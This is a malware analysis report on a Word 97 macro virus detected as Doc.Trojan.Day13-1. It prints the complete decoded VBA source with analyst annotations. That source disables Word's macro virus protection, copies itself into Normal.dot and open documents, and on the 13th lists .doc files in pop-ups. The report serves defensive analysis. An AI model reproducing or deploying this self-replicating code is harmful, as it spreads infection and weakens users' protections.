Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 241745f814d772f8…

MALICIOUS

Office (OLE)

36.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4e3406a5d00e5803a47da92467988b36 SHA-1: 934ef90dceefd58fcc7ba5d3ba0ff420402636d2 SHA-256: 241745f814d772f8d63d72ca65b629befd15430b8d2c1ff92f0534727101df01
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV (Doc.Trojan.Day13-1), with critical heuristics indicating the presence of VBA macros and an extracted artifact also flagged by ClamAV (Win.Trojan.C-286). The VBA macro in 'macros.bas' runs from Document_Close: it clears Word's macro virus-protection option and the Normal-template save prompt, reads its own source out of the document's VBA project through the VBE object model, and copies that source into the Normal template (NormalTemplate) or into the currently open document, which it then saves — the classic self-replicating Word 97 macro-virus pattern. On the 13th of any month it additionally searches the drive holding the Normal template for *.doc files and shows a message box for each one found. The complete macro source is visible in the extracted artifact; only the appended p-code dump is truncated. No network, download, shell or file-drop calls appear in the visible source, so a "downloader for a secondary stage" is not supported by this code; the observable impact is self-replication, disabling of Word's macro virus protection, and a nuisance pop-up payload.

Heuristics 2

  • ClamAV: Doc.Trojan.Day13-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Day13-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4644 bytes
SHA-256: cada6c99eb708d2450cad0d0d4b2b83deb8a75542976826b1ea701f5ad4f2a17
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst annotation (comment lines only; every code line below is byte-identical to the carved artifact) ---
' This is the 'ThisDocument' class module decoded from the OLE VBA storage (Macros/VBA/ThisDocument).
' VB_Base = "1Normal.ThisDocument" and VB_TemplateDerived = True suggest the module was created from
' the Normal template, which matches the replication target used in Document_Close.
' What the visible code does: on Document_Close it clears Word's macro virus-protection option, reads its
' own source through the VBE object model (VBProject.VBComponents(1).CodeModule), and writes that source
' into Normal.dot or the active document (self-replication). On the 13th of the month it lists *.doc
' files in message boxes. No network, shell, or file-drop calls are present in this module.

Option Explicit
' Module-level buffer: Document_Close fills it with this module's own source text and
' SendCode writes it into the target project's first code module.
Private strCode As String
Private Sub Document_Close()
' Trigger: runs whenever the infected document (or, once infected, the Normal template) is closed.
On Error Resume Next
' Every error below is silently swallowed, so a failed VBProject access or save never surfaces to the user.
With Options
' Suppress the "save changes to Normal template?" prompt so writing into Normal.dot is silent.
.SaveNormalPrompt = False
' Clear Word's "macro virus protection" option (Options.VirusProtection).
.VirusProtection = False
End With
Dim tdCode As Object
' Self-read: obtain the code module of this document's first VBA component (GetCodeModule)...
Set tdCode = GetCodeModule(ThisDocument)
With tdCode
' ...and copy its entire text (line 1 through CountOfLines) into the module-level strCode buffer.
strCode = .Lines(1, .CountOfLines)
End With
' Replication direction depends on where the macro is currently running:
If ThisDocument = NormalTemplate Then
' Running from the global template -> infect the document that is currently open, but only if it
' already has a path on disk, then save it so the injected code persists.
With ActiveDocument
If .Path <> vbNullString Then
SendCode ActiveDocument
.Save
End If
End With
Else
' Running from an infected document -> infect the Normal template so the macro is loaded
' in every future Word session.
SendCode NormalTemplate
End If
' Date-triggered payload: on the 13th of any month, enumerate *.doc files recursively from the
' root of the drive that holds Normal.dot (Left(FullName, 3), e.g. "C:\") and show a message box
' for each hit. In the visible code this is display-only; no file is modified or deleted here.
If Day(Now) = 13 Then
With Application.FileSearch
.NewSearch
.LookIn = Left(NormalTemplate.FullName, 3)
.SearchSubFolders = True
.FileName = "*.doc"
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
.Execute
Dim i As Integer
For i = 1 To .FoundFiles.Count
MsgBox .FoundFiles(i)
Next i
End With
End If
End Sub
' Returns the CodeModule of the first VBA component in objProject's VBProject (for a Word
' document or template this is its ThisDocument module). This is the VBE extensibility object
' model, which is the hook that lets the macro read its own source and rewrite the source of
' other documents and templates.
' NOTE(review): current Office builds block VBProject access unless "Trust access to the VBA
' project object model" is enabled; the sample was authored in Word 8.0 (1997), which predates
' that gate — not verifiable from the listing itself.
Private Function GetCodeModule(objProject As Object) As Object
Set GetCodeModule = objProject.VBProject.VBComponents(1).CodeModule
End Function
' Infection step, used for both NormalTemplate and ActiveDocument in Document_Close:
' overwrites the first code module of objProject with this macro's own source (strCode)
' by deleting every existing line and inserting the captured text at line 1.
Private Sub SendCode(objProject As Object)
Dim objCode As Object
Set objCode = GetCodeModule(objProject)
With objCode
.DeleteLines 1, .CountOfLines
.InsertLines 1, strCode
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/49d4c433f93e4b8f835728bd5aedccc6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3356 bytes
' Line #0:
' Line #1:
' 	Option  (Explicit)
' Line #2:
' 	Dim (Private) 
' 	VarDefn strCode (As String)
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #6:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #7:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #8:
' 	EndWith 
' Line #9:
' 	Dim 
' 	VarDefn tdCode (As Object)
' Line #10:
' 	SetStmt 
' 	Ld ThisDocument 
' 	ArgsLd GetCodeModule 0x0001 
' 	Set tdCode 
' Line #11:
' 	StartWithExpr 
' 	Ld tdCode 
' 	With 
' Line #12:
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	ArgsMemLdWith Lines 0x0002 
' 	St strCode 
' Line #13:
' 	EndWith 
' Line #14:
' 	Ld ThisDocument 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' Line #15:
' 	StartWithExpr 
' 	Ld ActiveDocument 
' 	With 
' Line #16:
' 	MemLdWith Path 
' 	Ld vbNullString 
' 	Ne 
' 	IfBlock 
' Line #17:
' 	Ld ActiveDocument 
' 	ArgsCall SendCode 0x0001 
' Line #18:
' 	ArgsMemCallWith Save 0x0000 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	EndWith 
' Line #21:
' 	ElseBlock 
' Line #22:
' 	Ld NormalTemplate 
' 	ArgsCall SendCode 0x0001 
' Line #23:
' 	EndIfBlock 
' Line #24:
' 	Ld Now 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000D 
' 	Eq 
' 	IfBlock 
' Line #25:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd FileSearch 
' 	With 
' Line #26:
' 	ArgsMemCallWith NewSearch 0x0000 
' Line #27:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	MemStWith LookIn 
' Line #28:
' 	LitVarSpecial (True)
' 	MemStWith SearchSubFolders 
' Line #29:
' 	LitStr 0x0005 "*.doc"
' 	MemStWith FileName 
' Line #30:
' 	LitVarSpecial (False)
' 	MemStWith MatchTextExactly 
' Line #31:
' 	Ld msoFileTypeAllFiles 
' 	MemStWith FileType 
' Line #32:
' 	ArgsMemCallWith Execute 0x0000 
' Line #33:
' 	Dim 
' 	VarDefn i (As Integer)
' Line #34:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	For 
' Line #35:
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	ArgsCall MsgBox 0x0001 
' Line #36:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #37:
' 	EndWith 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	EndSub 
' Line #40:
' 	FuncDefn (Private Function GetCodeModule(objProject As Object, id_FFFE As Object) As Object)
' Line #41:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld objProject 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd Co
... (truncated)